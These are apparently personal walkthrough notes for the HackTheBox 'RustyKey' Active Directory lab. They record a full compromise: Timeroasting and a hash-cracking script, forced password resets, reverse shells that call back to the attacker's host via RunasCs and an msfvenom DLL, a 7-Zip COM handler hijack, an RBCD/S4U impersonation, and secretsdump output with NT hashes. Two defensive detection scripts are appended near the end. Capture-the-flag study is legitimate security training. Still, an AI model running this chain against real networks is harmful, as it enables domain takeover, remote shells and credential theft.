Here are my notes on the RUSTYKEY box from HackTheBox.
RUSTYKEY: 10.129.242.90
As is common in real life Windows pentests, you will start the RustyKey box with credentials for the following account: rr.parker / 8#t5HE8L!W3A
rr.parker:8#t5HE8L!W3A
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-09-03 23:35:54Z)
sudo GetNPUsers.py -no-pass -dc-ip 10.129.242.90 -usersfile users.txt rustykey.htb/
#No AS-REP roasting or Kerberoasting here.
#How about Timeroasting?
Timeroasting:
https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/timeroasting
https://github.com/SecuraBV/Timeroast
https://medium.com/@offsecdeer/targeted-timeroasting-stealing-user-hashes-with-ntp-b75c1f71b9ac
Prerequisites for Timeroasting:
1. The target must be a computer account; ordinary user accounts cannot be directly targeted (unless "Targeted Timeroasting" modifies their properties).
2. The target domain controller must have the NTP service running and responding with Microsoft SNTP Extended Authentication (MS-SNTP), with UDP port 123 open.
3. The attacker can send unauthenticated MS-SNTP requests to the DC (without valid credentials).
4. The attacker can enumerate the RIDs (Relative Identifiers) of computer accounts in the domain.
5. (Optional) For "Targeted Timeroasting," domain administrator privileges are required to temporarily modify the user account properties to treat it as a computer account.
6. The computer account passwords in the domain are not strongly protected (e.g., weak passwords or not regularly changed).
┌──(root㉿kali)-[/home/kali/BOXES/RUSTYKEY/10.129.242.90/Timeroast]
└─# python3 timeroast.py 10.129.242.90
1000:$sntp-ms$78b6956f0ab6e56f0d296b956af2a12e$1c0111e900000000000a11074c4f434cec634bf38b963e9be1b8428bffbfcd0aec6362666b960a98ec6362666b965cce
1104:$sntp-ms$eb8b4e995cbc22bdf0e92c513dcd1240$1c0111e900000000000a11074c4f434cec634bf38ce0688be1b8428bffbfcd0aec6362671d0109ebec6362671d014148
1103:$sntp-ms$3c355af8f8e12f98ce43e46d7bcf6431$1c0111e900000000000a11074c4f434cec634bf38b64c3cee1b8428bffbfcd0aec6362671b856026ec6362671b859fe7
1105:$sntp-ms$598be939a40532b9ee6d7a063f4162bb$1c0111e900000000000a11074c4f434cec634bf38e6d71f3e1b8428bffbfcd0aec6362671e8e16aeec6362671e8e4fb9
1106:$sntp-ms$77d1ee46632c1b3ea82da2bf85e97a0e$1c0111e900000000000a11074c4f434cec634bf38bd1625de1b8428bffbfcd0aec636267200aa2f1ec636267200ac987
1107:$sntp-ms$9c3df1a7e91ba12d98794d937fb8f8f1$1c0111e900000000000a11074c4f434cec634bf38da71b62e1b8428bffbfcd0aec63626721e0553fec63626721e08942
1118:$sntp-ms$107ca2c551d614edb17d79796a310e4c$1c0111e900000000000a11074c4f434cec634bf38be01076e1b8428bffbfcd0aec6362672ff8825dec6362672ff8b80d
1119:$sntp-ms$7e001a8f555799f6b0d66a3617123752$1c0111e900000000000a11074c4f434cec634bf38db4beb9e1b8428bffbfcd0aec63626731cd2186ec63626731cd64a2
1120:$sntp-ms$a7c2367e770cab3db251f4bd52fa1950$1c0111e900000000000a11074c4f434cec634bf38e317416e1b8428bffbfcd0aec636267366252dbec6362673662c343
1121:$sntp-ms$d536b8ec44e45e5e6f43a2b90661d31f$1c0111e900000000000a11074c4f434cec634bf38e5c2ed4e1b8428bffbfcd0aec636267368d2369ec636267368d6b8d
1122:$sntp-ms$fb33680d89f80f03d0966fdc7dda0b1d$1c0111e900000000000a11074c4f434cec634bf38c624066e1b8428bffbfcd0aec636267386a40e6ec636267386a890a
1123:$sntp-ms$83e2de7c62e4c2fe4b9ea3981ee96612$1c0111e900000000000a11074c4f434cec634bf38deebe8fe1b8428bffbfcd0aec63626739f6c0bcec63626739f70585
1124:$sntp-ms$df923bfbf44f3ac33cd4be9b962b3666$1c0111e900000000000a11074c4f434cec634bf38b4f6167e1b8428bffbfcd0aec6362673b700cd8ec6362673b7036c9
1125:$sntp-ms$70c9c3cb751c117dcc6cf39760d50687$1c0111e900000000000a11074c4f434cec634bf38d67084ce1b8428bffbfcd0aec6362673d87ad08ec6362673d87ecc8
1126:$sntp-ms$ae709d09305e19f34ef6f3f6eace656f$1c0111e900000000000a11074c4f434cec634bf38d684563e1b8428bffbfcd0aec6362673d88e6c3ec6362673d892329
1127:$sntp-ms$979530097deb251d798191bedf1befef$1c0111e900000000000a11074c4f434cec634bf38b5db9efe1b8428bffbfcd0aec6362673f96e9bbec6362673f972621
timecrack-fixed.py: #Fixed version of timecrack.
```python
#!/usr/bin/env python3
"""
Perform a simple dictionary attack against the output of timeroast.py.
The NTP 'hash' format does not fit into Hashcat or John right now.
Not even optimized, but still useful for cracking legacy default passwords
(where the password is the computer name) or specific default passwords
that are popular in an organization.
"""
import hashlib
import sys
import re
from binascii import unhexlify
from argparse import ArgumentParser, FileType, RawDescriptionHelpFormatter
from typing import TextIO, Generator, Tuple

# Expected format: rid:$sntp-ms$<hashval>$<salt>
# hashval is the 16-byte MD5 authenticator, salt the 48-byte NTP reply packet.
HASH_FORMAT = r'^(?P<rid>\d+):\$sntp-ms\$(?P<hashval>[0-9a-f]{32})\$(?P<salt>[0-9a-f]{96})$'


def md4(data: bytes) -> bytes:
    """Return an MD4 digest, falling back to pure Python if OpenSSL lacks md4."""
    try:
        return hashlib.new('md4', data).digest()
    except ValueError:
        from md4 import MD4  # Fallback module (md4.py from the Timeroast repository must be importable)
        return MD4(data).bytes()


def compute_hash(password: str, salt: bytes) -> bytes:
    """Compute a legacy NTP authenticator 'hash': MD5(NT hash || NTP packet)."""
    return hashlib.md5(md4(password.encode('utf-16le')) + salt).digest()


def try_crack(hashfile: TextIO, dictfile: TextIO) -> Generator[Tuple[int, str], None, None]:
    """Try to crack hashes using a given dictionary."""
    hashes = []
    for line in hashfile:
        line = line.strip()
        if line:
            m = re.match(HASH_FORMAT, line)
            if not m:
                print(f'ERROR: invalid hash format: {line}', file=sys.stderr)
                sys.exit(1)
            rid, hashval, salt = m.group('rid', 'hashval', 'salt')
            hashes.append((int(rid), unhexlify(hashval), unhexlify(salt)))

    # Every candidate password is tried against every collected hash.
    for password in dictfile:
        password = password.strip()
        for rid, hashval, salt in hashes:
            if compute_hash(password, salt) == hashval:
                yield rid, password


def main():
    argparser = ArgumentParser(
        formatter_class=RawDescriptionHelpFormatter,
        description="""Perform a simple dictionary attack against the output of timeroast.py.
Not even optimized, but still useful for cracking legacy default
passwords (where the password is the computer name) or specific default
passwords that are popular in an organization.
"""
    )
    argparser.add_argument('hashes', type=FileType('r'),
                           help='Output of timeroast.py')
    argparser.add_argument('dictionary', type=lambda f: open(f, encoding='latin-1'),
                           help='Line-delimited password dictionary (e.g. rockyou.txt)')
    args = argparser.parse_args()

    crackcount = 0
    for rid, password in try_crack(args.hashes, args.dictionary):
        print(f'[+] Cracked RID {rid} password: {password}')
        crackcount += 1
    print(f'\n{crackcount} passwords recovered.')


if __name__ == '__main__':
    main()
```
python3 timecrack-fixed.py hash.txt /usr/share/wordlists/rockyou.txt
IT-COMPUTER3$:Rusty88!
BLOODHOUND DATA:
IT-COMPUTER3$ -> AddSelf -> HELPDESK Group:
bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k add groupMember HELPDESK 'IT-COMPUTER3$'
HELPDESK Group -> ForceChangePassword -> BB.MORGAN:
bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k set password BB.MORGAN 'Password123@'
bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'PROTECTED OBJECTS' 'IT'
getTGT.py rustykey.htb/bb.morgan:'Password123@' -dc-ip 10.129.242.90
export KRB5CCNAME=bb.morgan.ccache
evil-winrm -i dc.rustykey.htb -r rustykey.htb
┌──(root㉿kali)-[/home/kali/BOXES/RUSTYKEY/10.129.242.90]
└─# evil-winrm -i dc.rustykey.htb -r rustykey.htb
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> whoami
rustykey\bb.morgan
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> hostname
dc
USER-SHELL !
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
nxc ldap dc.rustykey.htb -u rr.parker -p '8#t5HE8L!W3A' --dns-tcp --dns-server 10.129.242.90 -k --bloodhound --collection All
nxc ldap dc.rustykey.htb -u rr.parker -p '8#t5HE8L!W3A' -k --asreproast output.txt
nxc ldap dc.rustykey.htb -u rr.parker -p '8#t5HE8L!W3A' -k --kerberoasting output.txt
#NOPE and DON'T BOTHER kerberoasting and asreproasting.
445/tcp open microsoft-ds?
No Guest.
NT_STATUS_NOT_SUPPORTED = Kerberos authentication?
┌──(root㉿kali)-[/home/kali/BOXES/RUSTYKEY/10.129.242.90]
└─# cat /etc/krb5.conf
[libdefaults]
default_realm = RUSTYKEY.HTB
dns_lookup_kdc = false
dns_lookup_realm = false
[realms]
RUSTYKEY.HTB = {
kdc = dc.rustykey.htb
admin_server = dc.rustykey.htb
default_domain = rustykey.htb
}
[domain_realm]
.rustykey.htb = RUSTYKEY.HTB
rustykey.htb = RUSTYKEY.HTB
┌──(root㉿kali)-[/home/kali/BOXES/RUSTYKEY/10.129.242.90]
└─# crackmapexec smb dc.rustykey.htb -d rustykey.htb -u rr.parker -p '8#t5HE8L!W3A' -k
SMB dc.rustykey.htb 445 dc.rustykey.htb [*] x64 (name:dc.rustykey.htb) (domain:rustykey.htb) (signing:True) (SMBv1:False)
SMB dc.rustykey.htb 445 dc.rustykey.htb [+] rustykey.htb\rr.parker:8#t5HE8L!W3A
crackmapexec smb dc.rustykey.htb -d rustykey.htb -u rr.parker -p '8#t5HE8L!W3A' -k --shares
SMB dc.rustykey.htb 445 dc.rustykey.htb [*] x64 (name:dc.rustykey.htb) (domain:rustykey.htb) (signing:True) (SMBv1:False)
SMB dc.rustykey.htb 445 dc.rustykey.htb [+] rustykey.htb\rr.parker:8#t5HE8L!W3A
SMB dc.rustykey.htb 445 dc.rustykey.htb [+] Enumerated shares
SMB dc.rustykey.htb 445 dc.rustykey.htb Share Permissions Remark
SMB dc.rustykey.htb 445 dc.rustykey.htb ----- ----------- ------
SMB dc.rustykey.htb 445 dc.rustykey.htb ADMIN$ Remote Admin
SMB dc.rustykey.htb 445 dc.rustykey.htb C$ Default share
SMB dc.rustykey.htb 445 dc.rustykey.htb IPC$ READ Remote IPC
SMB dc.rustykey.htb 445 dc.rustykey.htb NETLOGON READ Logon server share
SMB dc.rustykey.htb 445 dc.rustykey.htb SYSVOL READ Logon server share
getTGT.py rustykey.htb/rr.parker:'8#t5HE8L!W3A' -dc-ip 10.129.242.90
export KRB5CCNAME=rr.parker.ccache
sudo lookupsid.py -k rr.parker@10.129.242.90 | tee usernames
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
#Based on Bloodhound Data:
*Evil-WinRM* PS C:\Users\bb.morgan\Desktop> whoami
rustykey\bb.morgan
*Evil-WinRM* PS C:\Users\bb.morgan\Desktop> hostname
dc
*Evil-WinRM* PS C:\Users\bb.morgan\Desktop> dir
Directory: C:\Users\bb.morgan\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/4/2025 9:15 AM 1976 internal.pdf
-ar--- 9/3/2025 4:22 PM 34 user.txt
*Evil-WinRM* PS C:\Users\bb.morgan\Desktop> type user.txt
[REDACTED]
USER.TXT: [REDACTED]
PRIV ESC:
bb.morgan -> ee.reed:
┌──(root㉿kali)-[/home/kali/BOXES/RUSTYKEY/10.129.242.90]
└─# evil-winrm -i dc.rustykey.htb -r rustykey.htb
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> cd ..
*Evil-WinRM* PS C:\Users\bb.morgan> cd Desktop
*Evil-WinRM* PS C:\Users\bb.morgan\Desktop> download internal.pdf
Info: Downloading C:\Users\bb.morgan\Desktop\internal.pdf to internal.pdf
Info: Download successful!
internal.pdf:
Internal Memo
From: bb.morgan@rustykey.htb
To: support-team@rustykey.htb
Subject: Support Group - Archiving Tool Access
Date: Mon, 10 Mar 2025 14:35:18 +0100
Hey team,
As part of the new Support utilities rollout, extended access has been temporarily granted to allow
testing and troubleshooting of file archiving features across shared workstations.
This is mainly to help streamline ticket resolution related to extraction/compression issues reported
by the Finance and IT teams. Some newer systems handle context menu actions differently, so
registry-level adjustments are expected during this phase.
A few notes:
- Please avoid making unrelated changes to system components while this access is active.
- This permission change is logged and will be rolled back once the archiving utility is confirmed
stable in all environments.
- Let DevOps know if you encounter access errors or missing shell actions.
Thanks,
BB Morgan
IT Department
EE.REED is a member of the support-team group.
IT-COMPUTER3$ -> AddSelf -> HELPDESK Group:
bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k add groupMember HELPDESK 'IT-COMPUTER3$'
HELPDESK Group -> ForceChangePassword -> EE.REED:
bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k set password EE.REED 'Password123@'
bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'PROTECTED OBJECTS' 'SUPPORT'
┌──(root㉿kali)-[/home/kali/BOXES/RUSTYKEY/10.129.242.90]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k add groupMember HELPDESK 'IT-COMPUTER3$'
[+] IT-COMPUTER3$ added to HELPDESK
┌──(root㉿kali)-[/home/kali/BOXES/RUSTYKEY/10.129.242.90]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k set password EE.REED 'Password123@'
[+] Password changed successfully!
┌──(root㉿kali)-[/home/kali/BOXES/RUSTYKEY/10.129.242.90]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'PROTECTED OBJECTS' 'SUPPORT'
[-] SUPPORT removed from PROTECTED OBJECTS
./RunasCs.exe ee.reed Password123@ powershell.exe -r 10.10.14.170:1234
┌──(root㉿kali)-[/home/kali/BOXES/RUSTYKEY]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.170] from (UNKNOWN) [10.129.242.90] 64092
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
rustykey\ee.reed
PS C:\Windows\system32> hostname
hostname
dc
ee.reed SHELL !
ee.reed -> mm.turner:
#FROM internal.pdf: it mentioned an archiving tool with context menu actions, so it's probably 7-Zip or something similar.
PS C:\Windows\system32> reg query "HKCU\Software\Classes\*\shellex\ContextMenuHandlers"
reg query "HKCU\Software\Classes\*\shellex\ContextMenuHandlers"
ERROR: The system was unable to find the specified registry key or value.
PS C:\Windows\system32> reg query "HKLM\Software\Classes\*\shellex\ContextMenuHandlers"
reg query "HKLM\Software\Classes\*\shellex\ContextMenuHandlers"
HKEY_LOCAL_MACHINE\Software\Classes\*\shellex\ContextMenuHandlers\7-Zip
HKEY_LOCAL_MACHINE\Software\Classes\*\shellex\ContextMenuHandlers\ModernSharing
HKEY_LOCAL_MACHINE\Software\Classes\*\shellex\ContextMenuHandlers\Open With
HKEY_LOCAL_MACHINE\Software\Classes\*\shellex\ContextMenuHandlers\Open With EncryptionMenu
HKEY_LOCAL_MACHINE\Software\Classes\*\shellex\ContextMenuHandlers\Sharing
HKEY_LOCAL_MACHINE\Software\Classes\*\shellex\ContextMenuHandlers\{90AA3A4E-1CBA-4233-B8BB-535773D48449}
HKEY_LOCAL_MACHINE\Software\Classes\*\shellex\ContextMenuHandlers\{a2a9545d-a0c2-42b4-9708-a0b2badd77c8}
reg query "HKLM\Software\Classes\*\shellex\ContextMenuHandlers\7-Zip"
PS C:\Windows\system32> reg query "HKCR\CLSID\{23170F69-40C1-278A-1000-000100020000}" /s
reg query "HKCR\CLSID\{23170F69-40C1-278A-1000-000100020000}" /s
HKEY_CLASSES_ROOT\CLSID\{23170F69-40C1-278A-1000-000100020000}
(Default) REG_SZ 7-Zip Shell Extension
HKEY_CLASSES_ROOT\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32
(Default) REG_SZ C:\Program Files\7-Zip\7-zip.dll
ThreadingModel REG_SZ Apartment
PS C:\Windows\system32> icacls "C:\Program Files\7-Zip\7-zip.dll"
icacls "C:\Program Files\7-Zip\7-zip.dll"
C:\Program Files\7-Zip\7-zip.dll NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
DLL Hijacking: DLL Injection
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.170 LPORT=4444 -f dll -o rev.dll
PS C:\Windows\system32> mkdir C:\Temp
mkdir C:\Temp
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/3/2025 7:40 PM Temp
PS C:\Windows\system32> cd C:\Temp
cd C:\Temp
PS C:\Temp> dir
dir
PS C:\Temp>
nc -lnvp 1234 (on other shell)
$clsid = 'HKLM:\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}'
Set-ItemProperty "$clsid\InprocServer32" '(default)' 'C:\tmp\rev.dll'
reg add "HKLM\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" /ve /d "C:\tmp\rev.dll" /f
$clsid = 'HKLM:\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}'
Set-ItemProperty "$clsid\InprocServer32" '(default)' 'C:\Temp\rev.dll'
reg add "HKLM\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" /ve /d "C:\Temp\rev.dll" /f
sudo rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.170] from (UNKNOWN) [10.129.242.90] 60645
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows>whoami
whoami
rustykey\mm.turner
C:\Windows>hostname
hostname
dc
mm.turner SHELL !
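The shell above came from repointing the 7-Zip shell extension's `InprocServer32` default value at a DLL outside `C:\Program Files`, which is the artifact a defender should be hunting for. The added example below is my own code, not from this writeup or any tool it uses: it parses the text a `reg query HKLM\SOFTWARE\Classes\CLSID /s` dump produces (the same layout as the `reg query` output above), collects every `InprocServer32` default value, and flags handlers whose DLL is not under a trusted root or is a bare file name resolved through the DLL search order. The sample dump is constructed and modelled on the box: the real 7-Zip CLSID repointed at `C:\Temp\rev.dll`, plus a placeholder CLSID `{00000000-0000-0000-0000-000000000001}` that still points into the Windows directory. The trusted-root list is an assumption to tune per build.

```python
import re

# Directories an in-process COM server is normally loaded from (assumption: tune per build/host)
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\", "%systemroot%\\")

KEY_RE = re.compile(r"^(HKEY_[A-Z_]+\\.*)$")
INPROC_KEY_RE = re.compile(r"\\CLSID\\(\{[0-9A-Fa-f-]+\})\\InprocServer32$", re.IGNORECASE)
DEFAULT_VALUE_RE = re.compile(r"^\s*\(Default\)\s+(REG_SZ|REG_EXPAND_SZ)\s+(.*?)\s*$", re.IGNORECASE)

# Constructed sample in the layout reg query /s prints: the 7-Zip handler repointed at C:\Temp\rev.dll,
# and a placeholder CLSID (not a real one) whose server still lives under %SystemRoot%.
SAMPLE_DUMP = """\
HKEY_CLASSES_ROOT\\CLSID\\{23170F69-40C1-278A-1000-000100020000}
    (Default)    REG_SZ    7-Zip Shell Extension
HKEY_CLASSES_ROOT\\CLSID\\{23170F69-40C1-278A-1000-000100020000}\\InprocServer32
    (Default)    REG_SZ    C:\\Temp\\rev.dll
    ThreadingModel    REG_SZ    Apartment
HKEY_CLASSES_ROOT\\CLSID\\{00000000-0000-0000-0000-000000000001}\\InprocServer32
    (Default)    REG_EXPAND_SZ    %SystemRoot%\\System32\\shell32.dll
    ThreadingModel    REG_SZ    Apartment
"""


def inproc_servers(dump: str):
    """Yield (clsid, dll_path) for every InprocServer32 default value in a 'reg query ... /s' dump."""
    current_key = None
    for line in dump.splitlines():
        key_match = KEY_RE.match(line.strip())
        if key_match:                      # unindented HKEY_... lines name the key that follows
            current_key = key_match.group(1)
            continue
        if current_key is None:
            continue
        clsid_match = INPROC_KEY_RE.search(current_key)
        value_match = DEFAULT_VALUE_RE.match(line)
        if clsid_match and value_match:    # indented (Default) line under an InprocServer32 key
            yield clsid_match.group(1), value_match.group(2).strip('"')


def is_trusted_path(path: str) -> bool:
    """True when the DLL sits under a trusted root; bare names (DLL search order) are never trusted."""
    return path.lower().startswith(TRUSTED_ROOTS)


def suspicious_inproc_servers(dump: str) -> list:
    """Return [(clsid, path)] for every handler whose DLL lies outside the trusted roots."""
    return [(clsid, path) for clsid, path in inproc_servers(dump) if not is_trusted_path(path)]


if __name__ == "__main__":
    for clsid, path in suspicious_inproc_servers(SAMPLE_DUMP):
        print(f"[!] {clsid} -> {path}")
```

Feed it the saved output of `reg query HKLM\SOFTWARE\Classes\CLSID /s` (and the HKCU hive, which is checked first by COM and needs no admin rights to write), then follow each hit with the same `icacls` check the notes use on `7-zip.dll`; a trusted path that is writable by `BUILTIN\Users` is the other half of this finding.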
BLOODHOUND DATA:
mm.turner -> Member of DelegationManager -> AddAllowedToAct -> dc.rustykey.htb: #RBCD Attack.
#We are going to point it to IT-COMPUTER3$ since we have a password for it.
#PowerView variant (the target object is DC, not IT-COMPUTER3$, and $SDBytes must first be built from IT-COMPUTER3$'s SID):
#Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
#Equivalent with the RSAT ActiveDirectory module:
Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount IT-COMPUTER3$
Get-ADComputer DC -Properties msDS-AllowedToActOnBehalfOfOtherIdentity
PS C:\Users\mm.turner> Get-ADComputer DC -Properties msDS-AllowedToActOnBehalfOfOtherIdentity
Get-ADComputer DC -Properties msDS-AllowedToActOnBehalfOfOtherIdentity
DistinguishedName : CN=DC,OU=Domain Controllers,DC=rustykey,DC=htb
DNSHostName : dc.rustykey.htb
Enabled : True
Name : DC
ObjectClass : computer
ObjectGUID : dee94947-219e-4b13-9d41-543a4085431c
SamAccountName : DC$
SID : S-1-5-21-3316070415-896458127-4139322052-1000
UserPrincipalName :
Enabled: True = #This is the one you're looking for.
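`msDS-AllowedToActOnBehalfOfOtherIdentity` is stored as a binary self-relative security descriptor, so `Get-ADComputer` cannot show at a glance who was granted delegation; the ACCESS_ALLOWED ACEs in its DACL are the accounts that may now impersonate users to the DC through S4U2proxy. The added example below is my own code, not from this writeup or any tool it uses: it decodes that descriptor (MS-DTYP layout: 20-byte header, owner SID, ACL with ACE entries) and reports which SIDs are allowed to act, which is the audit a defender runs over every computer object to catch an RBCD change like the one above. `sample_rbcd_descriptor` builds constructed test input of the shape `Set-ADComputer` writes; the domain SID is the one shown in the output above, the RID 1105 is a placeholder, not IT-COMPUTER3$'s real RID.

```python
import struct

# Constants from the Windows security descriptor format (MS-DTYP)
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
ACL_REVISION_DS = 4


def encode_sid(sid: str) -> bytes:
    """Encode 'S-1-5-21-...' as revision, sub-authority count, 48-bit big-endian authority, LE sub-authorities."""
    parts = sid.split('-')
    if parts[0] != 'S' or parts[1] != '1':
        raise ValueError('bad SID %r' % sid)
    subs = [int(p) for p in parts[3:]]
    return bytes([1, len(subs)]) + int(parts[2]).to_bytes(6, 'big') + struct.pack('<%dI' % len(subs), *subs)


def decode_sid(buf: bytes, off: int):
    """Decode the binary SID at offset off; returns (sid_string, size_in_bytes)."""
    rev, count = buf[off], buf[off + 1]
    if rev != 1:
        raise ValueError('unsupported SID revision %d' % rev)
    authority = int.from_bytes(buf[off + 2:off + 8], 'big')
    subs = struct.unpack_from('<%dI' % count, buf, off + 8)
    return 'S-%d-%d%s' % (rev, authority, ''.join('-%d' % s for s in subs)), 8 + 4 * count


def sample_rbcd_descriptor(delegator_sids) -> bytes:
    """Constructed test input: owner BUILTIN\\Administrators, no group/SACL, one full-access
    ACCESS_ALLOWED ACE per principal, which is the shape Set-ADComputer writes into the attribute."""
    owner = encode_sid('S-1-5-32-544')
    aces = b''
    for sid in delegator_sids:
        sid_bytes = encode_sid(sid)
        ace_size = 4 + 4 + len(sid_bytes)                     # header + access mask + SID
        aces += struct.pack('<BBHI', ACCESS_ALLOWED_ACE_TYPE, 0, ace_size, 0x000F01FF) + sid_bytes
    acl = struct.pack('<BBHHH', ACL_REVISION_DS, 0, 8 + len(aces), len(delegator_sids), 0) + aces
    header = struct.pack('<BBHIIII', 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         20, 0, 0, 20 + len(owner))           # offsets: owner, group, SACL, DACL
    return header + owner + acl


def descriptor_owner(sd: bytes) -> str:
    """Owner SID of the descriptor, or '' when none is present."""
    off_owner = struct.unpack_from('<BBHIIII', sd, 0)[3]
    return decode_sid(sd, off_owner)[0] if off_owner else ''


def allowed_to_act_sids(sd: bytes) -> list:
    """SIDs granted by ACCESS_ALLOWED ACEs in the DACL: the accounts permitted to delegate to this object."""
    rev, _, control, _, _, _, off_dacl = struct.unpack_from('<BBHIIII', sd, 0)
    if rev != 1:
        raise ValueError('unsupported descriptor revision %d' % rev)
    if not (control & SE_DACL_PRESENT) or off_dacl == 0:
        return []
    ace_count = struct.unpack_from('<BBHHH', sd, off_dacl)[3]
    pos, sids = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from('<BBH', sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(decode_sid(sd, pos + 8)[0])            # SID follows the 4-byte access mask
        pos += ace_size                                        # skip unknown ACE types by size
    return sids


def unexpected_delegators(sd: bytes, approved) -> list:
    """Audit helper: delegators not on the approved list (for a DC that list is normally empty)."""
    allowed = set(approved)
    return [s for s in allowed_to_act_sids(sd) if s not in allowed]


if __name__ == '__main__':
    sd = sample_rbcd_descriptor(['S-1-5-21-3316070415-896458127-4139322052-1105'])  # placeholder RID
    print('owner     :', descriptor_owner(sd))
    print('delegators:', allowed_to_act_sids(sd))
    print('unexpected:', unexpected_delegators(sd, []))
```

The raw attribute bytes come straight out of LDAP (the value ldap3 or an `ldapsearch -o ldif-wrap=no` export returns for the computer object); resolving each SID to a sAMAccountName is a separate lookup. Any non-empty result on a domain controller object, or any change to the attribute at all (directory service event 5136 if auditing is on), is the detection for the step above.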
backupadmin user -> DCSYNC -> dc.rustykey.htb
getTGT.py rustykey.htb/IT-COMPUTER3$:'Rusty88!' -dc-ip 10.129.242.90
export KRB5CCNAME='IT-COMPUTER3$.ccache'
getST.py -spn 'cifs/dc.rustykey.htb' -impersonate 'backupadmin' 'rustykey.htb/IT-COMPUTER3$:Rusty88!'
┌──(root㉿kali)-[/home/kali/BOXES/RUSTYKEY/10.129.242.90]
└─# getST.py -spn 'cifs/dc.rustykey.htb' -impersonate 'backupadmin' 'rustykey.htb/IT-COMPUTER3$:Rusty88!'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Impersonating backupadmin
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in backupadmin.ccache
export KRB5CCNAME=backupadmin.ccache
secretsdump.py -k -no-pass backupadmin@dc.rustykey.htb
┌──(root㉿kali)-[/home/kali/BOXES/RUSTYKEY/10.129.242.90]
└─# secretsdump.py -k -no-pass backupadmin@dc.rustykey.htb
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x94660760272ba2c07b13992b57b432d4
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e3aac437da6f5ae94b01a6e5347dd920:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
